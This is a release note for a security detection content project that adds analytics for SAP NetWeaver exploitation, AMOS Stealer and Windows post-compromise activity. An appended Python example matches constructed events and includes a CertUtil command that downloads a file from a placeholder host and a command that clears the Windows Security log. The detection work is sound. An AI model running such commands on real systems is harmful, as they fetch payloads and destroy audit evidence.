
v5.5.0

@patel-bhavin patel-bhavin released this 08 May 17:38
· 501 commits to develop since this release
c01f075

Highlights

  • 🛡️ SAP NetWeaver Exploitation
    Released a new analytic story targeting CVE-2025-31324 in SAP NetWeaver, including a dedicated hunting detection for “SAP NetWeaver Visual Composer Exploitation Attempt” to catch early signs of exploitation. You can read more about this vulnerability here.

  • 🍏 AMOS Stealer Analytics
    Added a new analytic story for AMOS Stealer and introduced the “macOS AMOS Stealer – Virtual Machine Check Activity” detection, which looks for the execution of the osascript command along with specific command-line strings.

  • 🪟 Additional Windows Detections
    We shipped three new Windows-focused detections to improve visibility into post-compromise activity: one that identifies reconnaissance by monitoring built-in log query utilities against the Windows Event Log, another that alerts when an adversary clears the Event Log via Wevtutil, and a third that detects malicious file downloads executed through the CertUtil utility.
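The three Windows detections above describe their logic only in outline. The following is an added illustration, not content from the release or from the project's own detection code: it runs simplified versions of that logic over constructed process-creation events. The host names, paths, the pipe-delimited event format and the analytic names are all assumptions made for the example.

```python
import re

# Constructed sample process-creation events (not real telemetry), one per line:
# host|image|command_line. Hosts and file paths are invented for the example.
SAMPLE_EVENTS = """\
WS01|C:\\Windows\\System32\\wevtutil.exe|wevtutil qe Security /c:50 /rd:true /f:text
WS01|C:\\Windows\\System32\\wevtutil.exe|wevtutil cl Security
WS02|C:\\Windows\\System32\\certutil.exe|certutil -urlcache -split -f http://example.invalid/p.bin C:\\Users\\Public\\p.bin
WS02|C:\\Windows\\System32\\certutil.exe|certutil -hashfile C:\\Users\\Public\\setup.msi SHA256
WS03|C:\\Windows\\System32\\wevtutil.exe|wevtutil gl Application
"""

def _tokens(command_line: str) -> list[str]:
    """Lower-case the command line and normalise '/switch' to '-switch' so both
    switch spellings CertUtil accepts compare equal."""
    return [re.sub(r"^/", "-", t) for t in command_line.lower().split()]

def classify(image: str, command_line: str) -> list[str]:
    """Return the (illustrative) analytic names one process-creation event triggers."""
    image = image.lower()
    toks = _tokens(command_line)
    hits = []
    if image.endswith("wevtutil.exe") and len(toks) >= 2:
        # wevtutil's verb is its first argument: qe/query-events reads a log
        # (reconnaissance), cl/clear-log wipes it (defence evasion).
        if toks[1] in ("qe", "query-events"):
            hits.append("Windows Event Log Query via Wevtutil")
        if toks[1] in ("cl", "clear-log"):
            hits.append("Windows Event Log Cleared via Wevtutil")
    if image.endswith("certutil.exe") and "-urlcache" in toks:
        # -urlcache together with -f and a URL makes CertUtil fetch a remote file;
        # -hashfile and other routine admin uses are deliberately not flagged.
        if "-f" in toks and any(t.startswith(("http://", "https://")) for t in toks):
            hits.append("Windows CertUtil Download")
    return hits

def scan(events: str) -> list[tuple[str, str, str]]:
    """Run every rule over pipe-delimited events; return (host, analytic, command_line)."""
    findings = []
    for line in events.splitlines():
        if not line.strip():
            continue
        host, image, command_line = line.split("|", 2)
        for name in classify(image, command_line):
            findings.append((host, name, command_line))
    return findings

if __name__ == "__main__":
    for host, name, cmd in scan(SAMPLE_EVENTS):
        print(f"{host}: {name}: {cmd}")
```

The benign `certutil -hashfile` and `wevtutil gl` events are included so the rules can be checked against ordinary administrative use as well as the behaviours the detections target.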

New Analytic Story - [2]

New Analytics - [5]

Other Updates

  • Updated the is_nirsoft_software lookup with additional NirSoft tooling
  • Updated attack_data links for several detections.